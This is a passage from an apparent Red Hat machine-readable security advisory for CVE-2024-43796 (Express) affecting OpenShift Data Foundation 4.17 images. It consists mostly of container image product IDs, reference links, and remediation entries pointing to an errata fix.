"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43796"
},
{
"category": "external",
"summary": "RHBZ#2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553",
"url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx",
"url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx"
}
],
"release_date": "2024-09-10T15:15:17.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
